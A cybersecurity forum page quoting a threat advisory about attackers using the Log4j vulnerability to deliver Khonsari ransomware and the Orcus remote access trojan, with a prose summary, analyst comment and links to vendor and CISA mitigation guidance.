Log in
Register
Cyber Forum
More options
Toggle width
Share this page
Share this page
Share
Share
Cyber Forum
Log in
Register
More options
Toggle width
Share this page
Share this page
Share
Share
Menu
Install the app
Install
Home
CyberWeekly Podcast
Breaking News! Podcast
Cyber Risk Rating
Forums
New posts
Forum list
Trending
Leaderboards
News Feeds
Resources
Latest reviews
Sophos X-Ops Intelix
Threat Reports
Members
Current visitors
My.CompTIA
Help Documents
Preference Center
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="MJ Shoer" data-source="post: 2483" data-attributes="member: 3"><p><h3><span style="color: rgb(184, 49, 47)">Severity: High</span> <span style="color: rgb(65, 168, 95)">TLP: Green</span> Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware</h3><p><strong>Tags</strong></p><ol> <li data-xf-list-type="ol"><strong>Cybercriminal Attack</strong></li> <li data-xf-list-type="ol"><strong>Ransomware Attack</strong></li> </ol><p><strong>Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware</strong></p><p><strong></strong></p><p><strong>Summary:</strong></p><p>“Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability. The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files, (<a href="https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html" target="_blank">TheHackerNews, 2021</a>).”</p><p></p><p><strong>Analyst Comments:</strong></p><p>It was only a matter of time before a ransomware attack would be confirmed after the log4j vulnerability was disclosed. Initially, some were unsure how the vulnerability could be leveraged in an actual cuber-attack. This report from Bitdefender confirms that ransomware operators will more than likely continue to leverage the vulnerability for some time.</p><p></p><p><strong>Mitigation:</strong></p><p>CISA released its website, which is dedicated to assisting companies in remediating vulnerabilities associated with CVE-2021-44228.</p><ul> <li data-xf-list-type="ul"><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" target="_blank">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">Microsoft blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation</a></li> <li data-xf-list-type="ul"><a href="https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html" target="_blank">Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild</a></li> <li data-xf-list-type="ul"><a href="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/" target="_blank">Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-4428: Analysis and Mitigations</a></li> <li data-xf-list-type="ul"><a href="https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/" target="_blank">CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations</a></li> <li data-xf-list-type="ul"><a href="https://securityintelligence.com/posts/apache-log4j-zero-day-vulnerability-update/" target="_blank">IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You</a></li> <li data-xf-list-type="ul"><a href="https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability?utm_campaign=00023584&utm_promoter=tenable-ops&utm_medium=homepage-hero&utm_content=other-rr-log4j-blog&utm_source=tenable-dot-com" target="_blank">Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)</a></li> <li data-xf-list-type="ul"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day" target="_blank">Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild content</a></li> <li data-xf-list-type="ul"><a href="https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html" target="_blank">Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/vsphere/2021/12/vmsa-2021-0028-log4j-what-you-need-to-know.html" target="_blank">VMware Blog: Log4j Vulnerability Security Advisory: What You Need to Know</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html" target="_blank">Investigating CVE-2021-44228 Log4Shell Vulnerability: VMWare Threat Research</a></li> </ul><p><strong>Source:</strong></p><p><a href="https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild" target="_blank">https://businessinsights.bitdefende...vulnerability-in-log4j2-exploited-in-the-wild</a></p><p><a href="https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html" target="_blank">https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html</a></p></blockquote><p></p>
[QUOTE="MJ Shoer, post: 2483, member: 3"] [HEADING=2][COLOR=rgb(184, 49, 47)]Severity: High[/COLOR] [COLOR=rgb(65, 168, 95)]TLP: Green[/COLOR] Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware[/HEADING] [B]Tags[/B] [LIST=1] [*][B]Cybercriminal Attack[/B] [*][B]Ransomware Attack[/B] [/LIST] [B]Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware Summary:[/B] “Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability. The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files, ([URL='https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html']TheHackerNews, 2021[/URL]).” [B]Analyst Comments:[/B] It was only a matter of time before a ransomware attack would be confirmed after the log4j vulnerability was disclosed. Initially, some were unsure how the vulnerability could be leveraged in an actual cuber-attack. This report from Bitdefender confirms that ransomware operators will more than likely continue to leverage the vulnerability for some time. [B]Mitigation:[/B] CISA released its website, which is dedicated to assisting companies in remediating vulnerabilities associated with CVE-2021-44228. [LIST] [*][URL]https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance[/URL] [*][URL='https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/']Microsoft blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation[/URL] [*][URL='https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html']Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild[/URL] [*][URL='https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/']Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-4428: Analysis and Mitigations[/URL] [*][URL='https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/']CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations[/URL] [*][URL='https://securityintelligence.com/posts/apache-log4j-zero-day-vulnerability-update/']IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You[/URL] [*][URL='https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability?utm_campaign=00023584&utm_promoter=tenable-ops&utm_medium=homepage-hero&utm_content=other-rr-log4j-blog&utm_source=tenable-dot-com']Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)[/URL] [*][URL='https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day']Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild content[/URL] [*][URL='https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html']Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued[/URL] [*][URL='https://blogs.vmware.com/vsphere/2021/12/vmsa-2021-0028-log4j-what-you-need-to-know.html']VMware Blog: Log4j Vulnerability Security Advisory: What You Need to Know[/URL] [*][URL='https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html']Investigating CVE-2021-44228 Log4Shell Vulnerability: VMWare Threat Research[/URL] [/LIST] [B]Source:[/B] [URL='https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild']https://businessinsights.bitdefende...vulnerability-in-log4j2-exploited-in-the-wild[/URL] [URL]https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html[/URL] [/QUOTE]
Name
Verification
Post reply
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
Top
Bottom
Home
Forums
Threat Reports
My.CompTIA
Menu